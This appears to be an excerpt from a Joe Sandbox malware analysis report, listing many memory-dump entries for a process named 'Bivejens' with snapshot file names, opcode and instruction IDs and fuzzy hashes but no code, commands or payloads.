                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7a9996cc27d3f8d81d1b66e1eee8a61ef4aa6a46e261af69fff243df65a743c0
                                                                                                                          • Instruction ID: 1bd75f6209bd17bc749b2866b50fc7e501e379c71c05eb44cf23b0f949407ca8
                                                                                                                          • Opcode Fuzzy Hash: 7a9996cc27d3f8d81d1b66e1eee8a61ef4aa6a46e261af69fff243df65a743c0
                                                                                                                          • Instruction Fuzzy Hash: 11819D74E412688FDB65DF69C991BDDBBB2BB89300F1080EAD85DA7250DB315E81CF44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0ce635b58849e326afd32073033c283fb0e9c024f7afe0e6a9f81a97da507802
                                                                                                                          • Instruction ID: ee13dc5fb33f885e7e9eabd3f80efbdb5a431c893254c660b4fd38795557217a
                                                                                                                          • Opcode Fuzzy Hash: 0ce635b58849e326afd32073033c283fb0e9c024f7afe0e6a9f81a97da507802
                                                                                                                          • Instruction Fuzzy Hash: 8A71C174E00218CFEB18DFA5C991B9DBBB2FF89300F648129D819AB355DB369946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6bae9faf50ec83a35744a14f1c990ffa6476536c519b02de9105e52d13762813
                                                                                                                          • Instruction ID: 1f1d3489e665735c71cfaf91805905149fabecf3bad8f39860bb6c446536afba
                                                                                                                          • Opcode Fuzzy Hash: 6bae9faf50ec83a35744a14f1c990ffa6476536c519b02de9105e52d13762813
                                                                                                                          • Instruction Fuzzy Hash: BF71C174E00218CFEB14DFA9C990ADDBBF2BF89300F648129D809AB355DB369946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d25e4428c974a8cd74060c611cf3c20cc7724619a0101c0269ba151ac31c1265
                                                                                                                          • Instruction ID: ee78bfa93bfab145a74dffe032de59e57756f5d773768b8ccd4eb111c453ce67
                                                                                                                          • Opcode Fuzzy Hash: d25e4428c974a8cd74060c611cf3c20cc7724619a0101c0269ba151ac31c1265
                                                                                                                          • Instruction Fuzzy Hash: 2F71A174E00218CFEB14DFA5C991ADDBBB2FF89300F648129D819AB355DB356A42DF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 77defa751c64e60e407f69aedfec183ee4dfb908b127530a3cb6b2f769c4941d
                                                                                                                          • Instruction ID: 9fdddb1546cd68d46a4da85859bb50c1a2ef3e79a51f9d36488da588c6494c97
                                                                                                                          • Opcode Fuzzy Hash: 77defa751c64e60e407f69aedfec183ee4dfb908b127530a3cb6b2f769c4941d
                                                                                                                          • Instruction Fuzzy Hash: 4371B274E00218CFEB14DFA5C991AEDBBB2BF89300F648129D419BB355DB355A42CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c8d25a85db69cc410ab9908ba4d1e643661070a5401f66decdbb7866462b3267
                                                                                                                          • Instruction ID: 5fbffc789d49d4b5c4a26b3f33fa55f1655137c8a2984bbb92cb5ee2013b055c
                                                                                                                          • Opcode Fuzzy Hash: c8d25a85db69cc410ab9908ba4d1e643661070a5401f66decdbb7866462b3267
                                                                                                                          • Instruction Fuzzy Hash: 7F51AC31308211DFDB159F24D894BBE3BB2BB88302F54456AE85A8F291DB75CC4ADB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ba4eb63044eceafa495442b6e40eb220d30a5abce4d0025db3ecdcfc4b65aac2
                                                                                                                          • Instruction ID: e20aa2b9e4e9f089c50c7b29294dfd97cb17452b8ec087cf5ceaa152a304911e
                                                                                                                          • Opcode Fuzzy Hash: ba4eb63044eceafa495442b6e40eb220d30a5abce4d0025db3ecdcfc4b65aac2
                                                                                                                          • Instruction Fuzzy Hash: 1951B434B001158FCB04DF79C59896E7BFABF88711B2181A9E54ADB361DB34DD058BA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0ec231529114b99af4536d9f0492a619d7649f590d113ca29acad030df618a4c
                                                                                                                          • Instruction ID: 1a49592fd33fb9f6c93e338e7c0bd028e725a198c28aafd8339f0158758abced
                                                                                                                          • Opcode Fuzzy Hash: 0ec231529114b99af4536d9f0492a619d7649f590d113ca29acad030df618a4c
                                                                                                                          • Instruction Fuzzy Hash: 59619E74E012289FEB65DF69CC91BDDBBB2AB89300F1081E9D51CA7250EB315E85CF40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b4c368cb390b73052f7f1e807e5f8bdc4514de3c6eee53f2b3d210867695dc44
                                                                                                                          • Instruction ID: 54d220d2a04f408e73a97e385f5b1606c33bdfdf18159584e3e222e0d94c6421
                                                                                                                          • Opcode Fuzzy Hash: b4c368cb390b73052f7f1e807e5f8bdc4514de3c6eee53f2b3d210867695dc44
                                                                                                                          • Instruction Fuzzy Hash: 46517074E01208DFDB54DFA9D9949DDBBF2BF89300F24816AE819AB365DB31A905CF10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dfef6afa3b64638024bbb480b83fe114c386ef4578ba5a60aa7bb62f48d35cbf
                                                                                                                          • Instruction ID: ad8cb05d98cedf04ca3d051da870595304b9f4fc7b083e685fe6a6a52bd25444
                                                                                                                          • Opcode Fuzzy Hash: dfef6afa3b64638024bbb480b83fe114c386ef4578ba5a60aa7bb62f48d35cbf
                                                                                                                          • Instruction Fuzzy Hash: 1F51B374E01218CFCB48DFA9D48499DBBF6FF89311B208169E819AB324DB35AC55CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 99703c96e5a75188f7c8ea93a5c4aaa1a30f946a7703dafabe5377c2b6ae3881
                                                                                                                          • Instruction ID: 1b80b5f71a0e5ebc992f90bafbe758554c0a2d47b0bc81e2261f03f55748edf5
                                                                                                                          • Opcode Fuzzy Hash: 99703c96e5a75188f7c8ea93a5c4aaa1a30f946a7703dafabe5377c2b6ae3881
                                                                                                                          • Instruction Fuzzy Hash: B341DD31A44248CFCF11CFA4C848AADBFB2BF49316F048255E9659F2A1D370ED58CB62
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cd475729d17361177d72d2bfb577e3e87da8a06eaf0181d62299ec3f0f70b241
                                                                                                                          • Instruction ID: 843a6513520fba12d1cccc044099de6fa44d828e0d9b0f11c71cfba9c24fd8c7
                                                                                                                          • Opcode Fuzzy Hash: cd475729d17361177d72d2bfb577e3e87da8a06eaf0181d62299ec3f0f70b241
                                                                                                                          • Instruction Fuzzy Hash: E6410074E04218CFDB00DFA5D894BEDBBF2BB89310F10806AD819A7390EB355A4ACF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1d95d5cc5bd44f253dac1b1eb40e7d7d62e418861d6d1978d4102b5f45a08733
                                                                                                                          • Instruction ID: 89579a6982aa718b5fa30c791b6ec4d0f3443875545ede3a190799b03fafe48f
                                                                                                                          • Opcode Fuzzy Hash: 1d95d5cc5bd44f253dac1b1eb40e7d7d62e418861d6d1978d4102b5f45a08733
                                                                                                                          • Instruction Fuzzy Hash: F441D174D00218CFDB44DFA5C994BEDBBF2BB49304F10806AD819A7294EB355A46CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4beca0dc309ae6f5bb60db9faf462a70afecfddff1371de66468c11c32e64d6e
                                                                                                                          • Instruction ID: afd09452ff06a399acf904bb8c688ef8aea1821791d10695581830e0dea8e3b1
                                                                                                                          • Opcode Fuzzy Hash: 4beca0dc309ae6f5bb60db9faf462a70afecfddff1371de66468c11c32e64d6e
                                                                                                                          • Instruction Fuzzy Hash: 62414870640219CFCB15CF28C898A6A7BB6BF48312F510169E915DB3B0CB71DD94CB92
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4c76fc2b2ca372acd86db3c456f9700d6ae84c9ce07ccf223759a17f0a3adefb
                                                                                                                          • Instruction ID: b55b3941695d59feaf88142a14cb49570efb82ec524ab50750359a34d4a7e373
                                                                                                                          • Opcode Fuzzy Hash: 4c76fc2b2ca372acd86db3c456f9700d6ae84c9ce07ccf223759a17f0a3adefb
                                                                                                                          • Instruction Fuzzy Hash: 1931C930304251CFDB298B79D85063E7777BF89312B25049BE866EF2A2DF64CC888755
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d4043396736a7281956d6dc104ef376ecd5d3b3eb75630fde7910cfa2f434c1e
                                                                                                                          • Instruction ID: 5aac2c0ec1cc5e20178a7effbbd2bface5e82d87c36c99775fafd5966e856ab8
                                                                                                                          • Opcode Fuzzy Hash: d4043396736a7281956d6dc104ef376ecd5d3b3eb75630fde7910cfa2f434c1e
                                                                                                                          • Instruction Fuzzy Hash: 46417E30600245CFDB00CF68C844B6A7BF6EF89312F558466E928CF265D775DC45CBA2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 844726a0610b428e2a251fd55ec6b1537e28ab80b84ac704aa7f237f15c7dd57
                                                                                                                          • Instruction ID: 489d4d4622e85a4202834739620acdb06bcab2ddc942b7d2b203f27dbd089276
                                                                                                                          • Opcode Fuzzy Hash: 844726a0610b428e2a251fd55ec6b1537e28ab80b84ac704aa7f237f15c7dd57
                                                                                                                          • Instruction Fuzzy Hash: A231A331204149DFCF059F64D9A4AAE3BB7EF88311F608028FD199B255CB35DEA5DBA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b914b56881723bceb4a9c5e92f116ddc773b65c191fd66efac07fa7d9cd5c855
                                                                                                                          • Instruction ID: c6bbc011446a54266e9ad50bd15bc85b629f062a95e86da7b6a0e870e6130b29
                                                                                                                          • Opcode Fuzzy Hash: b914b56881723bceb4a9c5e92f116ddc773b65c191fd66efac07fa7d9cd5c855
                                                                                                                          • Instruction Fuzzy Hash: E031F674D002188FDB08DFAAD951AEEBBF2AF89300F24C12AD418BB254DB355946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 039004ebdf0b148d97c5b4328bba1355f487ea9ed5fdfba8a7a3437e59994a34
                                                                                                                          • Instruction ID: 943e107c60d7c140b8d28431f6be0b00db8b4a03245a215933d91096f332b57a
                                                                                                                          • Opcode Fuzzy Hash: 039004ebdf0b148d97c5b4328bba1355f487ea9ed5fdfba8a7a3437e59994a34
                                                                                                                          • Instruction Fuzzy Hash: D631EE71E042188FEB08DFAAD851ADEBBF2BF89300F14C12AC418BB255DB365946CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 504f600d047736499ebd47d33e110254b4e10abe32f7e8887cc5445383964678
                                                                                                                          • Instruction ID: 11f1866071f29d25f9c85e74b231daf759eb9d1741c3ce0121d716768e82cfa6
                                                                                                                          • Opcode Fuzzy Hash: 504f600d047736499ebd47d33e110254b4e10abe32f7e8887cc5445383964678
                                                                                                                          • Instruction Fuzzy Hash: 6331C174E01258CFDB18DFAAD850AEEBBF2BF89300F14D12AC418AB254DB745906CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: af8bda679dc4b990f4ff71fac1a69b74405a59ad3e3d6581ce4ac140ef67251a
                                                                                                                          • Instruction ID: 0d84382a11845328eb6ec9ea90060b5e2ef9977dc51a314b614c1ab9799acdf8
                                                                                                                          • Opcode Fuzzy Hash: af8bda679dc4b990f4ff71fac1a69b74405a59ad3e3d6581ce4ac140ef67251a
                                                                                                                          • Instruction Fuzzy Hash: 2431E274D052088FDB18DFAAD550ADDBBF2AF89300F24C12AC408BB264DB355A46CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: da328840f065ebd3c9fb37f8de25fc64fc68cfa31cc28025f0e395835adc5516
                                                                                                                          • Instruction ID: 9b752eb8e58f3f9a435b67590cc7d0f47187d0b0f7ffb8b5ce75ec4c37215adc
                                                                                                                          • Opcode Fuzzy Hash: da328840f065ebd3c9fb37f8de25fc64fc68cfa31cc28025f0e395835adc5516
                                                                                                                          • Instruction Fuzzy Hash: 6031B175E012088FDB08DFAAD5506DEBBF2EF89301F24842AC418BB264DB355A46CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 801388eaff0e1e5a4948e0f45c5e0b939c355f0f4a6b72f5a287b0acb5e59c4a
                                                                                                                          • Instruction ID: e06986026ba208da88c7d5ddae0b85546563914f18d65a4ed8913c2750027a9f
                                                                                                                          • Opcode Fuzzy Hash: 801388eaff0e1e5a4948e0f45c5e0b939c355f0f4a6b72f5a287b0acb5e59c4a
                                                                                                                          • Instruction Fuzzy Hash: 8731A175E012188FDB18DFAAD850AEEBBB2BFC9300F10D12AD418BB255DB355946CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 815913f5195582203a751c18e4cd49d674870d0ce329da83bba45a6e9b5eae9c
                                                                                                                          • Instruction ID: 57e8c9c20e6393214aa72ad8d967ec765fa9e371b7dc74223dc6c99ed65b9564
                                                                                                                          • Opcode Fuzzy Hash: 815913f5195582203a751c18e4cd49d674870d0ce329da83bba45a6e9b5eae9c
                                                                                                                          • Instruction Fuzzy Hash: 8B21B031304202CBDB2557398854B7F26A6AFC474AF248039DC16EF7A5EF65CC8B9791
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 85fe89aa912b33285e324851048043440bcb387c84037a0f7c10892598614eb1
                                                                                                                          • Instruction ID: ebf576b46d4cd299f784e82bb8bec4d49ffd93aba32d9cad3a54df050c9d3351
                                                                                                                          • Opcode Fuzzy Hash: 85fe89aa912b33285e324851048043440bcb387c84037a0f7c10892598614eb1
                                                                                                                          • Instruction Fuzzy Hash: 26319074E016088FEB08DFAAD550ADEBBF2AF89300F64912AD418BB254DB355A46CF54
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 98f22de7161d91e24d967494eb2f990ee3c0bf79c3ac17e680da20a494d19517
                                                                                                                          • Instruction ID: e474d91273da548ba293672d090f30167a6082513bcf41b07413a36921c69967
                                                                                                                          • Opcode Fuzzy Hash: 98f22de7161d91e24d967494eb2f990ee3c0bf79c3ac17e680da20a494d19517
                                                                                                                          • Instruction Fuzzy Hash: 0721F330300212CBDB2967398854B3F36A6AFC474A7148039DD16EF765EF65CC8AD791
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 96e6e4d654278e2effec07a2db8775dcedfadc8c345fd9f2242d41d0e7bd84fd
                                                                                                                          • Instruction ID: 8597e02219acc27f28c51606759bb6988081222e85293e7782e93801e27bb747
                                                                                                                          • Opcode Fuzzy Hash: 96e6e4d654278e2effec07a2db8775dcedfadc8c345fd9f2242d41d0e7bd84fd
                                                                                                                          • Instruction Fuzzy Hash: CC215E36B001249FCB15DB68C4409AE7BA5FFAA365F60C069EC199B340DB31EE46CBD1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a49a597d0cdeca8d34c234dae7e6a66c4eba2dc4a8727f07602154e38c485307
                                                                                                                          • Instruction ID: 23b4966ce7d3484742391fe23c5591b7c86fd6bc848af8bfb7ce5ba926ee9a37
                                                                                                                          • Opcode Fuzzy Hash: a49a597d0cdeca8d34c234dae7e6a66c4eba2dc4a8727f07602154e38c485307
                                                                                                                          • Instruction Fuzzy Hash: F321FF35304511CFC7199B29C89852EB7A2FF893523658078E82ECB7A4CF31DC068BD0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595225558.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_ad000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 77797e50d5e4e909746620687049221563d38cfb33e3174d62b78f8965664200
                                                                                                                          • Instruction ID: 3b287f7e225e9c16b788f3e98ebc00492bfac6d512d751c7062ac4706bae3bbb
                                                                                                                          • Opcode Fuzzy Hash: 77797e50d5e4e909746620687049221563d38cfb33e3174d62b78f8965664200
                                                                                                                          • Instruction Fuzzy Hash: A3210775504304EFDB24CF60D9C4F26BBA1FB85314F24C66EE94A4B642C77AD846CA62
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 81fd28cd1220b046a8d6e70b537340f84f53e42e0a6473683d6cc5b8cae7e207
                                                                                                                          • Instruction ID: 66d4b9d7a9c3b16369d7cbf1ed7b454a7b5493fd307330bafbe6a4416e044ef1
                                                                                                                          • Opcode Fuzzy Hash: 81fd28cd1220b046a8d6e70b537340f84f53e42e0a6473683d6cc5b8cae7e207
                                                                                                                          • Instruction Fuzzy Hash: 36217C71E00215CFCB50DF78D844A9E7BF9BF49262B2041A9E889E7360DB31D9058BA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cd32750cd52da8cb486257fd4152122e495824f6a65a97d51c564428b9137d53
                                                                                                                          • Instruction ID: 87958a4b104e8c965843033d1d6fbb4ab761dea6a6aa2a3e2fd27d4db584c684
                                                                                                                          • Opcode Fuzzy Hash: cd32750cd52da8cb486257fd4152122e495824f6a65a97d51c564428b9137d53
                                                                                                                          • Instruction Fuzzy Hash: 1F1138327082459FCB074A689C106EA3F77EFC1352B2840A7F955CB192DB358E1A97A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f843554d1508bc9eedf70f8b51af1402da6e68c7d35cf13cd3cbbbfacf847491
                                                                                                                          • Instruction ID: 6c269b263c5b8bf72f2665b3589f22f2ceea99ca65d0bcd4d560916cfa9fece5
                                                                                                                          • Opcode Fuzzy Hash: f843554d1508bc9eedf70f8b51af1402da6e68c7d35cf13cd3cbbbfacf847491
                                                                                                                          • Instruction Fuzzy Hash: 98210531605148DFCB019F24D9A47AE3BB2EB88315F608068FC199F345CB35DE55DBA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
